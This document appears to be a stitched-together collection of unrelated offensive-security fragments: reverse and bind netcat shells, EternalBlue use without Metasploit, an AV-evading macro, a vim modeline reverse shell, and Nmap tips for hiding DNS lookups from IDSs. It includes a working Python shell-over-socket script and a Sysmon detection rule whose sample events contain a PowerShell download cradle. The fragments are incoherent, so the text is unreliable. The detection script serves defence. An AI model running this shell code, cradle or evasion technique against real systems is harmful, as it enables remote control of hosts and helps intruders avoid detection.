If you want to reverse the roles, i.e. have the High Sierra machine establish the connection to the remote device and give the remote device access to bash on the HS host, you move the listen flag (-l) to the other side. So the remote device starts netcat first, in listen mode:
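The role reversal described above, as an added illustration rather than the original post's netcat command: the Python script below (assumed, not part of the original) re-creates a bind shell and a reverse shell over the loopback interface so the two arrangements can be compared in one run. The code that serves the shell is identical in both; the only thing that changes is which side listens, which is exactly what moving the -l flag does with netcat.

```python
"""Reverse shell versus bind shell: which end of netcat listens.

Added example for this article; it is not the original post's netcat
command. It re-creates both arrangements in Python over the loopback
interface so the two roles can be run side by side in one process:

  bind shell    -> the target listens (the nc -l side), the operator connects in.
  reverse shell -> the operator listens (the nc -l side), the target connects
                   out and hands over a shell.

The same code serves the shell in both cases; only the direction of the
TCP connection changes. The "shell" runs each received line with /bin/sh,
so run this only on a host you control; the commands used are harmless echoes.
"""
import socket
import subprocess
import threading

HOST = "127.0.0.1"  # loopback only: nothing here is exposed to the network


def serve_shell(conn: socket.socket) -> None:
    """Target side: execute each received line and send the output back."""
    with conn, conn.makefile("rb") as lines:
        for raw in lines:
            cmd = raw.decode().strip()
            if cmd == "exit":
                break
            result = subprocess.run(cmd, shell=True, capture_output=True)
            conn.sendall(result.stdout + result.stderr)


def operate_shell(conn: socket.socket, commands: list[str]) -> str:
    """Operator side: send the commands, then read until the target closes."""
    with conn:
        for cmd in commands:
            conn.sendall(f"{cmd}\n".encode())
        conn.sendall(b"exit\n")
        conn.shutdown(socket.SHUT_WR)
        chunks = []
        while data := conn.recv(4096):
            chunks.append(data)
    return b"".join(chunks).decode()


def _listener() -> socket.socket:
    """Bind an ephemeral loopback port; the caller decides which role accepts."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((HOST, 0))
    srv.listen(1)
    return srv


def bind_shell_demo(commands: list[str]) -> str:
    """Target listens (nc -l on the target); the operator connects to it."""
    srv = _listener()
    port = srv.getsockname()[1]

    def target() -> None:
        conn, _ = srv.accept()
        srv.close()
        serve_shell(conn)

    t = threading.Thread(target=target, daemon=True)
    t.start()
    output = operate_shell(socket.create_connection((HOST, port)), commands)
    t.join(timeout=10)
    return output


def reverse_shell_demo(commands: list[str]) -> str:
    """Operator listens (nc -l on the operator); the target connects out to it."""
    srv = _listener()
    port = srv.getsockname()[1]

    def target() -> None:
        serve_shell(socket.create_connection((HOST, port)))

    t = threading.Thread(target=target, daemon=True)
    t.start()
    conn, _ = srv.accept()
    srv.close()
    output = operate_shell(conn, commands)
    t.join(timeout=10)
    return output


if __name__ == "__main__":
    print("bind shell   :", bind_shell_demo(["echo hello from bind shell"]))
    print("reverse shell:", reverse_shell_demo(["echo hello from reverse shell", "id"]))
```

The practical difference is who has to be reachable: a bind shell needs an inbound port open on the target, a reverse shell only needs the target to be able to connect out, which is why egress filtering on the target network is what breaks the second arrangement.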
We will need three command windows for this to work: one to host our PowerShell payload, one for the reverse shell listener, and one to execute the exploit itself. We can observe that it worked: the exploit pulled the file from our server and we got the reverse TCP PowerShell shell back.
We now have our exploit binary. All we have to do is execute the exploit and wait for our shell. Going back one folder and executing the exploit, we get an error and, despite it, a successful reverse shell.
In this long blog post, we looked at multiple ways to use the EternalBlue exploit with and without a pipe name. We created reverse shells and injected our own administrator user. I hope this post clears up the confusion among people trying to use EternalBlue without Metasploit. This is part 1 of the series; more posts are on their way. Cheers!
Making our payload undetectable by AV and WAF solutions should be enough to evade most detections, but increasingly we see tools like Sysmon used to detect binaries launched by IIS and Apache: a web server worker process spawning cmd.exe or powershell.exe is a process-tree anomaly that is easy to alert on regardless of what the payload looks like.
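What such a Sysmon-based detection looks like in practice, as an added example (this code is not from the original post, and the event records in it are constructed): a rule over Sysmon Event ID 1 (process creation) records that flags IIS or Apache worker processes spawning a shell, and escalates when the child's command line carries a PowerShell download-and-execute cradle of the kind used to fetch a reverse-shell stage. The field names (Image, ParentImage, CommandLine, User) are Sysmon's own; the paths, hosts and users are invented.

```python
"""Flag web-server worker processes that spawn shells (Sysmon Event ID 1).

Added example, not from the original post. The events below are
constructed to look like Sysmon process-creation records after a SIEM
has flattened EventData into JSON; the field names (Image, ParentImage,
CommandLine, User) are the real Sysmon ones, the paths and hosts are
made up. The rule encodes the detection the post warns about: IIS
(w3wp.exe) or Apache (httpd.exe) should almost never have cmd.exe or
powershell.exe as a child, and a child whose command line carries a
download cradle is the payload stage itself.
"""
import json
from pathlib import PureWindowsPath
from typing import Optional

WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe", "apache.exe", "nginx.exe", "php-cgi.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                  "mshta.exe", "certutil.exe", "bitsadmin.exe", "rundll32.exe"}
# Children IIS spawns legitimately (ASP.NET dynamic compilation). Keep this
# allow-list short and environment-specific; a broad one is how webshells hide.
EXPECTED_CHILDREN = {"csc.exe", "cvtres.exe", "conhost.exe"}
# Substrings typical of a PowerShell download-and-execute stage (matched case-insensitively).
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-expression", "iex ", "iex(",
                  "frombase64string", "-enc ", "-encodedcommand")


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path; works on any host OS."""
    return PureWindowsPath(path).name.lower()


def classify(event: dict) -> Optional[str]:
    """Return a severity for a suspicious web-server child process, or None."""
    if event.get("EventID") != 1:          # only process-creation events
        return None
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    if parent not in WEB_SERVER_PARENTS or child in EXPECTED_CHILDREN:
        return None
    cmdline = event.get("CommandLine", "").lower()
    if any(marker in cmdline for marker in CRADLE_MARKERS):
        return "critical"                  # download cradle: payload stage in flight
    if child in SHELL_CHILDREN:
        return "high"                      # interactive shell under a web worker
    return "medium"                        # unexpected child: triage the binary


def scan(lines: list[str]) -> list[tuple[str, str, str]]:
    """Run classify() over JSON lines; return (severity, parent, child) per hit."""
    hits = []
    for line in lines:
        ev = json.loads(line)
        sev = classify(ev)
        if sev:
            hits.append((sev, basename(ev["ParentImage"]), basename(ev["Image"])))
    return hits


# Constructed sample events (not real telemetry), serialised as JSON lines.
SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "User": r"IIS APPPOOL\DefaultAppPool",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object "
                    "Net.WebClient).DownloadString('http://10.0.0.5:8000/rev.ps1')\""},
    {"EventID": 1, "ParentImage": r"C:\Apache24\bin\httpd.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "User": r"NT AUTHORITY\SYSTEM",
     "CommandLine": "cmd.exe /c whoami"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
     "User": r"IIS APPPOOL\DefaultAppPool", "CommandLine": "csc.exe /noconfig /fullpaths"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "User": r"CORP\jdoe", "CommandLine": "powershell.exe -c (New-Object Net.WebClient).DownloadString('http://intranet/x')"},
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\inetpub\wwwroot\uploads\svc.exe", "User": r"IIS APPPOOL\DefaultAppPool",
     "CommandLine": r"C:\inetpub\wwwroot\uploads\svc.exe"},
    {"EventID": 3, "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "Image": r"C:\Windows\System32\inetsrv\w3wp.exe", "User": r"IIS APPPOOL\DefaultAppPool"},
]
SAMPLE_LINES = [json.dumps(e) for e in SAMPLE_EVENTS]


if __name__ == "__main__":
    for hit in scan(SAMPLE_LINES):
        print(hit)
```

The explorer.exe event carries the same download cradle as the first one and is deliberately not flagged: this rule is about the parent-child relationship, and the cradle only raises the severity once that relationship is already anomalous. Pairing it with a separate command-line rule is what catches the workstation case.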
Unfortunately, this mode takes me too much time, so I decided to write a small script that lets me execute commands through the exploit just like in a real reverse shell.
I take it to my machine for a reverse engineering session, but luckily for me, before I start, I check the strings inside and find an interesting hex string.
It appears that a file was downloaded and saved under the name sshd, and that the file's creation date was then changed. What interests us most is the sshd binary, which should be the SSH service daemon running on the machine; probably a modified version, but modified how? We have therefore reached the point where a reverse engineering session is called for, even though, since it is a service, the parts that interest us will probably not run unless we connect to the service... if it even starts. We download the file to our machine and first take a look at the strings contained in the binary (too many times in this box we have avoided a long reverse engineering session).
In this post we will see how, using several simple tricks, it is possible to create a malicious macro that is undetectable by most conventional antivirus products. At the end of the post you will find how to prevent these attacks using AV Access Protection rules.
We proceed to upload the patched binary to the same location on our server, start listening on port 8888 and finally open the Word document again. This time there is no AV detection and the reverse shell is established. Now the attacker is able to execute commands on our computer from the remote server:
This question includes code from the original description of the vulnerability and the proof-of-concept file. In the worst case it will open a reverse shell that may grant privileges to other users and provide a shell interface to outside attackers. Do not execute this unless (1) you know that your system is not accessible to third parties (firewall, no multi-user systems) and (2) you know how to shut the shell down if it accidentally opens.
The idea seems to be that while the text file will appear to only contain the string "Nothing here.", it will open a reverse shell (/bin/sh) on port 9999 with netcat (nc) when opened with unpatched vim/neovim versions.
We can even keep it simpler and use a simple echo command for the exploit part. Since all we need is to show that we're able to run arbitrary local commands, using echo should be enough to demonstrate it (and, if you are interested, you can confirm that you can successfully replace that with a reverse proxy using nc or similar).
One probe commonly initiated by IDSs is a reverse DNS query of the attacker's IP address. A domain name in an alert is more valuable than just an IP address, after all. Unfortunately, attackers who control their own rDNS (quite common) can watch the logs in real time and learn that they have been detected. This is a good time for attackers to feed misinformation, such as bogus names and cache entries, to the requesting IDS.
The most effective way to eliminate this risk is to specify -n to disable all reverse DNS resolution. The problem with this approach is that you lose the valuable information provided by DNS. Fortunately, Nmap offers a way to gather this information while concealing the source. A substantial percentage of DNS servers on the Internet are open to recursive queries from anyone. Specify one or more of those name servers to the --dns-servers option of Nmap, and all rDNS queries will be proxied through them. Example 10.21 demonstrates this technique by conducting a list scan of some SecurityFocus IPs while using the public recursive DNS servers 18.104.22.168 and 22.214.171.124 to cover any tracks. Keep in mind that forward DNS still uses your host's configured DNS server, so specify target IP addresses rather than domain names to prevent even that tiny potential information leak. For this reason, Example 10.21 first shows the Linux host command being used to look up www.securityfocus.com rather than specifying that host name in the Nmap command line. To avoid IDS thresholds based on the number of requests from a single DNS server, you may specify dozens of comma-separated DNS servers to --dns-servers and Nmap will round-robin its requests among them.